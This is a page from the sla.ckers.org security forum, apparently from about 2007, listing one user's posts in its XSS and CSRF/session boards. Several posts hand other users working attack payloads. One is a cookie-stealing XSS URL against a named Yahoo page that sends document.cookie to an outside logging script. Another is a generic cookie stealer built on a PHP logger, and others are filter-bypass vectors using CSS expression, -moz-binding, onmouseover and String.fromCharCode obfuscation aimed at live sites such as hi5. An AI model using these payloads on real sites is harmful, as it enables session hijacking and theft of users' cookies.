Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 

Pages: 12345Next
Current Page: 1 of 5
Results 1 - 30 of 149
7 years ago
hasse
I have the book!
Forum: XSS Info
7 years ago
hasse
My order shipped today, estimated arrival time is 8 June 2007.
Forum: XSS Info
7 years ago
hasse
Mephisto Wrote: ------------------------------------------------------- > Sorry, I wasn't addressing the (<, ") encoding in > my response. If the application is doing HTML > Encoding (converting < or %3c to &lt;) then your > pretty much out of luck. Unless you can create the XSS inside the tag.
Forum: XSS Info
7 years ago
hasse
digitalIllusionism Wrote: ------------------------------------------------------- > @hasse: > Isn't this byte 219? > Momby's example is functional. I'm not certain > where I would specify a length value, but I only > overwrote between "" and "", rather than changing > the length. In other words: My string is > precisely the same size as Momby's, so
Forum: CSRF and Session Info
7 years ago
hasse
Couldn't you do something like: document.body.innerHTML.replace(input,output); And then add the CSS or other parts you may lose.
Forum: XSS Info
7 years ago
hasse
digitalIllusionism Wrote: ------------------------------------------------------- > > Use a hex editor to edit the file and go to byte > number 219 (the first byte being > > byte 0)." > > I thought a hex editor was any text editor > designed for coding. I've made progress by > learning what a hex editor is. Thank you. I > haven't been successful at usin
Forum: CSRF and Session Info
7 years ago
hasse
How about setting a chrome URL as the homepage somehow? I tried it and I had to edit the config files by hand to stop it from crashing constantly.
Forum: CSRF and Session Info
7 years ago
hasse
digitalIllusionism Wrote: ------------------------------------------------------- > That's the part I don't get. I see no part in the > example that resembles the structure of the string > "0xdb" in the example. I know "0x" denotes the > beginning of a memory address but I don't see how > that has anything to do getting this functional. > It looks like
Forum: CSRF and Session Info
7 years ago
hasse
mynice Wrote: ------------------------------------------------------- > Ehrmmm... JavaScript is fully enabled (no script > blockers or similar) in Firefox2 and IE6. It > doesn't execute in both browsers. :( > > Edit: The "alert(String.fromCharCode(88,83,83))" > is even shown up as a message. I can see this > injection string as message text. Exactly how d
Forum: XSS Info
7 years ago
hasse
fireboy Wrote: ------------------------------------------------------- > none of those solutions work kishord Does something like this work? http://business.cn.yahoo.com/bso?p=&pid="><script>document.write("<img src=http://site.ru/log.php?"%2Bdocument.cookie%2B">")</script>&ei=UTF-8&ch=ch You should be able to do that via an
Forum: XSS Info
7 years ago
hasse
hwEll Wrote: ------------------------------------------------------- > Yeah i know that but am asking the code too.. Just do a Google search for something like "php cookie stealer" and you'll find one.
Forum: XSS Info
7 years ago
hasse
You need a simple PHP script that basically writes the GET-parameters to a file. And then you need to make the user load your PHP script with the cookie as a parameter. For example: http://www.site.com/search.php?q=<script>document.write("<img src=http://your-site.ru/stealer.php?"+document.cookie+">")</script>
Forum: XSS Info
7 years ago
hasse
Try this:style=-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss);xx:expression(alert(1111))
Forum: XSS Info
7 years ago
hasse
Delixe Wrote: ------------------------------------------------------- > Yes but how is possible to execute any XSS without > a native tag? I can't use the < in my URL, it > gets stripped completely. Like some other people have mentioned, if you can input data inside tags it's possible. For example: <a href=YOUR_INPUT>Link</a> Just enter "# onmouseover=alert(1)
Forum: XSS Info
7 years ago
hasse
What if you try loading it as an iframe or image? EDIT: CrYpTiC_MauleR said it too...
Forum: XSS Info
7 years ago
hasse
I think this is quite common for sites like that. I've even found SQL-injections on other sites that show you your browser headers.
Forum: XSS Info
7 years ago
hasse
So the book's not quite done yet? Amazon says: Availability: Usually ships within 1 to 3 weeks. Shipping estimate: April 12, 2007 - April 16, 2007 Delivery estimate: April 25, 2007 - May 10, 2007
Forum: XSS Info
7 years ago
hasse
/nul Wrote: ------------------------------------------------------- > Hello, > > I found a site that is vulnerable to XSS via POST > parameter. I just can't reproduce XSS other way > than by inserting tag in Search field. Yeah, I > know about WhiteAcid's XSS POST Forwarder > (http://www.whiteacid.org/misc/xss_post_forwarder. > php). I tried some combinations, but
Forum: XSS Info
7 years ago
hasse
FR3DC3RV Wrote: ------------------------------------------------------- > The IE style vector turned into: > > <A style="xx: )" > href="http://www.hi5.com/friend/profile/displaySameProfile.do?userid=107126449#">a</A> Ok, how about: <a href=# style=xx:expr/*X*/ession(alert(1111))>a</a>
Forum: XSS Info
7 years ago
hasse
FR3DC3RV Wrote: ------------------------------------------------------- > @hasse: > Yes hannil.freehostia.com worked for me. What i > wanted to mean is that the style vectors weren't > able to bypass hi5 filter. Ok, I understand. What part was filtered or what was the problem?
Forum: XSS Info
7 years ago
hasse
FR3DC3RV Wrote: ------------------------------------------------------- > The style vectors didn't worked (at least for > me). Does this work for you in IE or Firefox? http://hannil.freehostia.com/style.html
Forum: XSS Info
7 years ago
hasse
DeltaOne Wrote: ------------------------------------------------------- > Well, they do block a variety of tags. And as > FR3DC3RV said, they block 'ipt>alert(1000)), > 'ipt>alert(1000)', leaving only ipt>alert(1000) > > What about the style vector? What are you > reffering at? Something like this in Firefox: <a href=# style=-moz-binding:url(http://ha.c
Forum: XSS Info
7 years ago
hasse
DeltaOne Wrote: ------------------------------------------------------- > Well, I actually tried , and it rendered - I > tried to find some way to obfuscate that tag. > > I don't think that they check for the endtag for > the script to see if someone inserts the tags, > because I can very easily add alert('omg!') > (although it won't do anything, because doesn't &
Forum: XSS Info
7 years ago
hasse
lobas Wrote: ------------------------------------------------------- > Do you have any examples of how i can use this > method, > as in using > document.location='http://site.com/c.php?c='+escape(document.cookie).substr(0,1900) You can use document.write and String.fromCharCode. For example: <script>document.write(String.fromCharCode(60,115,99,114,105,112,116,62,100,
Forum: XSS Info
7 years ago
hasse
Well at least the other posts aren't expanded to the right too, like in many other forums. EDIT: Right!
Forum: XSS Info
7 years ago
hasse
@tx: I believe that was something other than what I was thinking about. jungsonn Wrote: ------------------------------------------------------- > @hasse > > Do you mean the dojo toolkit crossdomain ajax > requests? Yes, perhaps that was it. I found a page here that describes it: http://tagneto.blogspot.com/2006/06/cross-domain-frame-communication-with.html
Forum: XSS Info
7 years ago
hasse
Hmm, I just remembered something I read about transferring data between domains using anchors (#), anyone remember what site that was on?
Forum: XSS Info
7 years ago
hasse
trev Wrote: ------------------------------------------------------- > The source code of what? My understanding is that > this is reflexive XSS - the JavaScript code inside > an image will not execute unless you open it in a > frame or a new window and the site itself will > hardly do that. You will have to put this frame > inside a frame on your site and then there will b
Forum: XSS Info
7 years ago
hasse
trev Wrote: ------------------------------------------------------- > The image doesn't have to be malformed, many image > formats allow to put comments into the images. > > If there is no session you cannot steal any > information. You can only create a frame with a > login form and hope the users types his password > into it. Couldn't he read the source code with
Forum: XSS Info
7 years ago
hasse
Mephisto Wrote: ------------------------------------------------------- > okay, found a site where I can put in "" and > anything else like that (, , , etc...), but it > won't allow the start tags (, , , , etc...) Anyone > know of a way around this?? > > It appears to filter anything that is < and any > Aa-Zz character after that. > > Update: I c
Forum: XSS Info
Pages: 12345Next
Current Page: 1 of 5